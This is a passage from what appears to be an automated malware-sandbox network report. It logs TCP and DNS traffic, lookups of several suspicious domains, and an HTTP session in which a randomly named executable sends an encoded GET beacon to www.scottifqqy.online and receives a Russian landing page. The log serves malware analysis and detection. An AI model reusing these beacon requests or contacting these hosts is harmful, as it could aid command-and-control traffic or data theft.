                                   Jul 17, 2024 19:00:27.018534899 CEST | 80 | 63898 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:32.076383114 CEST | 63899 | 80 | 192.168.2.6 | 13.248.169.48
                                   Jul 17, 2024 19:00:32.082515001 CEST | 80 | 63899 | 13.248.169.48 | 192.168.2.6
                                   Jul 17, 2024 19:00:32.082619905 CEST | 63899 | 80 | 192.168.2.6 | 13.248.169.48
                                   Jul 17, 2024 19:00:32.101264000 CEST | 63899 | 80 | 192.168.2.6 | 13.248.169.48
                                  Jul 17, 2024 19:00:32.106372118 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:32.576929092 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:32.577007055 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:33.616543055 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:33.621756077 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:34.649022102 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.131326914 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.131427050 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.154923916 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.160799980 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.621478081 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.621546984 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:36.664081097 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:36.669202089 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.696037054 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.701483011 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.701576948 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.730490923 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.778172016 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.778745890 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:38.233105898 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:38.233206987 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:39.244405985 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:39.249361038 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.279434919 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.290190935 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.290298939 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.312082052 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.317720890 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.776273012 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.778158903 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.778213024 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.788537979 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.821504116 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:45.850536108 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.855750084 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:45.855817080 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.875765085 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.881028891 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:47.382097006 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:47.392138958 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:47.392247915 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.415702105 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.461708069 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:48.461810112 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.496813059 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.510754108 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814909935 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814934015 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814984083 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.815005064 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.816356897 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.816373110 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.816406012 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.817234039 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.817250013 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.817281961 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.818510056 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.818526983 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.818624020 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.819751978 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.819796085 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.820142031 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.820537090 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.820594072 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.901336908 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901626110 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901642084 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901693106 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.902795076 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903101921 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.903343916 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903359890 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903404951 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.904361010 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.904377937 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.904418945 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.905524015 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.905539989 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.905587912 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.906825066 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.906841993 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.907012939 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.908093929 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.908147097 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909382105 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909398079 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909837961 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.910403013 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910419941 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910434961 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910487890 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.911432028 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.911447048 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.911500931 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.912466049 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.912527084 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.992147923 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992403984 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992420912 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992471933 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.993088007 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993103981 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993146896 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.993885994 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993938923 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:50.007220984 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.042542934 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.051851034 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:51.051981926 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.072601080 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.080840111 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:51.085391998 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334973097 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334986925 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334996939 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.335086107 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.336532116 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.336544037 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.336605072 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.337992907 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338002920 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338052034 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.338260889 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338273048 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338489056 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.339627981 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.339724064 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.340018988 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.340590954 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.340779066 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.425533056 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426264048 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426278114 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426408052 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.427084923 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.427189112 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.427649021 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.427659035 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428205967 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.428867102 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428879976 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428931952 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.430346966 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.430360079 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.430465937 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.431107998 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.431124926 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.431230068 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.432354927 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.432374001 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.432461977 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.433634043 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433653116 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433671951 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433815956 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.434681892 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.434700966 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.434776068 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.435400963 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435416937 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435430050 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435554028 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.435554028 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.541835070 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542162895 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542176008 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542331934 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.543270111 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.543382883 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.556777000 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.560080051 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.588272095 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.624525070 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.636013985 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:53.636113882 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.652504921 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.659629107 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.772675037 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.774240017 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.774305105 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:54.782886982 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:54.787957907 CEST8063907162.159.134.42192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 17, 2024 18:59:26.435115099 CEST | 53    | 55921 | 162.159.36.2 | 192.168.2.6
Jul 17, 2024 18:59:26.921986103 CEST | 55719 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 18:59:26.940397024 CEST | 53    | 55719 | 1.1.1.1      | 192.168.2.6
Jul 17, 2024 18:59:56.936863899 CEST | 54686 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 18:59:57.027658939 CEST | 53    | 54686 | 1.1.1.1      | 192.168.2.6
Jul 17, 2024 19:00:17.929001093 CEST | 60651 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 19:00:18.270139933 CEST | 53    | 60651 | 1.1.1.1      | 192.168.2.6
Jul 17, 2024 19:00:32.042959929 CEST | 61955 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 19:00:32.068703890 CEST | 53    | 61955 | 1.1.1.1      | 192.168.2.6
Jul 17, 2024 19:00:45.825529099 CEST | 60246 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 19:00:45.842580080 CEST | 53    | 60246 | 1.1.1.1      | 192.168.2.6
Jul 17, 2024 19:01:00.638252020 CEST | 53249 | 53    | 192.168.2.6  | 1.1.1.1
Jul 17, 2024 19:01:00.823290110 CEST | 53    | 53249 | 1.1.1.1      | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 17, 2024 18:59:26.921986103 CEST | 192.168.2.6 | 1.1.1.1 | 0xdd4e | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jul 17, 2024 18:59:56.936863899 CEST | 192.168.2.6 | 1.1.1.1 | 0x6ee4 | Standard query (0) | www.scottifqqy.online | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:17.929001093 CEST | 192.168.2.6 | 1.1.1.1 | 0xda65 | Standard query (0) | www.ancuapengiu28.com | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:32.042959929 CEST | 192.168.2.6 | 1.1.1.1 | 0xd3b7 | Standard query (0) | www.techacademy.store | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:45.825529099 CEST | 192.168.2.6 | 1.1.1.1 | 0x3a07 | Standard query (0) | www.goodneighbor.club | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:01:00.638252020 CEST | 192.168.2.6 | 1.1.1.1 | 0xb644 | Standard query (0) | www.me-sa.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 17, 2024 18:59:26.940397024 CEST | 1.1.1.1 | 192.168.2.6 | 0xdd4e | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jul 17, 2024 18:59:57.027658939 CEST | 1.1.1.1 | 192.168.2.6 | 0x6ee4 | No error (0) | www.scottifqqy.online | - | 185.179.189.181 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:18.270139933 CEST | 1.1.1.1 | 192.168.2.6 | 0xda65 | No error (0) | www.ancuapengiu28.com | ancuapengiu28.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 17, 2024 19:00:18.270139933 CEST | 1.1.1.1 | 192.168.2.6 | 0xda65 | No error (0) | ancuapengiu28.com | - | 172.96.191.69 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:32.068703890 CEST | 1.1.1.1 | 192.168.2.6 | 0xd3b7 | No error (0) | www.techacademy.store | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:32.068703890 CEST | 1.1.1.1 | 192.168.2.6 | 0xd3b7 | No error (0) | www.techacademy.store | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:00:45.842580080 CEST | 1.1.1.1 | 192.168.2.6 | 0x3a07 | No error (0) | www.goodneighbor.club | goodneighbor.club | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 17, 2024 19:00:45.842580080 CEST | 1.1.1.1 | 192.168.2.6 | 0x3a07 | No error (0) | goodneighbor.club | - | 162.159.134.42 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 19:01:00.823290110 CEST | 1.1.1.1 | 192.168.2.6 | 0xb644 | No error (0) | www.me-sa.online | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 17, 2024 19:01:00.823290110 CEST | 1.1.1.1 | 192.168.2.6 | 0xb644 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 17, 2024 19:01:00.823290110 CEST | 1.1.1.1 | 192.168.2.6 | 0xb644 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                  • www.scottifqqy.online
                                  • www.ancuapengiu28.com
                                  • www.techacademy.store
                                  • www.goodneighbor.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 63893 | 185.179.189.181 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
Timestamp | Bytes transferred | Direction | Data
Jul 17, 2024 18:59:57.073970079 CEST | 435 | OUT | GET /midu/?zn6L=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.scottifqqy.online
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 17, 2024 18:59:57.832782030 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Wed, 17 Jul 2024 16:59:57 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 7742
                                  Connection: close
                                  Cache-Control: no-cache, no-store, must-revalidate
                                  Expires: Wed, 17 Jul 2024 16:59:57 GMT
                                  Set-Cookie: _subid=1eic6uc5ium; expires=Sat, 17 Aug 2024 16:59:57 GMT; path=/
                                  Set-Cookie: 4c7a9=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQzODFcIjoxNzIxMjM1NTk3fSxcImNhbXBhaWduc1wiOntcIjE0MTFcIjoxNzIxMjM1NTk3fSxcInRpbWVcIjoxNzIxMjM1NTk3fSJ9.vLjw0wgN0otNlEtxJcWZvExQ1KDPoESK-97J9aw5X2s; expires=Thu, 02 Feb 2079 09:59:54 GMT; path=/
                                  Set-Cookie: a90624f7lp1411=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiODA2In0.k6xjJGpwMm2_CBJwU3JzuC-mEUO2nVnQcsQIqhR59a8; expires=Fri, 10 Jan 198392 13:59:57 GMT; path=/
                                  Set-Cookie: a90624f7lp1411ip=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCI4LjQ2LjEyMy4zM1wiIn0.8p3iaUjw-d2CpKgR-5Ws_zhLYUW2RmptlB9M-1uFdK4; expires=Fri, 10 Jan 198392 13:59:57 GMT; path=/
                                  Vary: Accept-Encoding
                                  Access-Control-Allow-Origin: *
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 2f 6e 6f 76 69 65 2d 7a 61 63 6f 6e 69 2d 73 2d 31 2d 69 79 75 6e 79 61 2d 32 30 32 34 2d 67 6f 64 61 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b0 d0 b6 d0 bd d1 8b d0 b5 20 d0 bd d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20
Data Ascii: <!DOCTYPE html> <html> <head><base href="/lander/novie-zaconi-s-1-iyunya-2024-goda/index.html"> <title>Важные новости</title> <meta charset="UTF-8"> <meta
Jul 17, 2024 18:59:57.833019018 CEST | 224 | IN | Data Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                  Data Ascii: http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <span id="0aa54c9b-2ec8-d0f0-247f-aebdff4fa0d5"></span> <script src="policy/valid
Jul 17, 2024 18:59:57.833050966 CEST | 1236 | IN | Data Raw: 61 74 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70
                                  Data Ascii: ator.js"></script> <link rel="stylesheet" href="style.css"> <script> function handleSubmit(event) { event.preventDefault(); alert(" !");
Jul 17, 2024 18:59:57.833086014 CEST | 1236 | IN | Data Raw: d0 bd d0 b8 d0 b7 d0 b0 d1 86 d0 b8 d1 8f d1 85 2e 3c 62 72 20 2f 3e 0d 0a 3c 62 72 20 2f 3e 0d 0a d0 92 d0 be d0 b4 d0 b8 d1 82 d1 8c 20 d1 82 d1 83 d1 80 d0 b8 d1 81 d1 82 d0 b8 d1 87 d0 b5 d1 81 d0 ba d0 b8 d0 b5 20 d0 b3 d1 80 d1 83 d0 bf d0
                                  Data Ascii: .<br /><br /> . .<br /><br />
Jul 17, 2024 18:59:57.833121061 CEST | 1236 | IN | Data Raw: d0 be d0 b3 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d0 b7 d0 b8 d0 b4 d0 b5 d0 bd d1 82 d1 8b 20 e2 80 94 20 d0 b3 d1 80 d0 b0 d0 b6 d0 b4 d0 b0 d0 bd d0 b5 20 d0 a0 d0 be d1 81 d1 81 d0 b8 d0 b8 2c 20 d0 b4 d0 be d0 bb d0 b6 d0 bd d1 8b 20 d1 81
                                  Data Ascii: , .
Jul 17, 2024 18:59:57.833153963 CEST | 1236 | IN | Data Raw: d0 b2 d1 81 d0 b5 d0 b3 d0 be 20 d1 81 d0 b0 d0 bc d0 b0 20 d1 84 d0 be d1 80 d0 bc d0 b0 20 d0 be d1 82 d1 87 d0 b5 d1 82 d0 b0 2e 20 d0 95 d0 b5 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d1 81 d0 ba d0 b0 d1 87 d0 b0 d1 82 d1 8c 20 d0 b7 d0 b4 d0 b5
                                  Data Ascii: . . <br /><br />
Jul 17, 2024 18:59:57.833188057 CEST | 1236 | IN | Data Raw: d0 ba d1 83 d0 bf d1 8e d1 80 d1 8b 3c 62 72 20 2f 3e 0d 0a d0 a1 20 32 30 20 d0 bc d0 b0 d1 8f 20 d0 bf d0 be 20 32 20 d0 b8 d1 8e d0 bd d1 8f 20 d0 b1 d0 b0 d0 bd d0 ba d0 b8 20 d0 b1 d0 b5 d0 b7 20 d0 ba d0 be d0 bc d0 b8 d1 81 d1 81 d0 b8 d0
                                  Data Ascii: <br /> 20 2 .
Jul 17, 2024 18:59:57.833224058 CEST | 1138 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 d0 92 d0 b0 d1 88 20 65 6d 61 69 6c 22 3e 0a
Data Ascii: <input type="email" name="email" placeholder="Ваш email"> <input type="submit" value=""><br> <span class="gdpr-block"> <label>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.6 | 63895 | 172.96.191.69 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
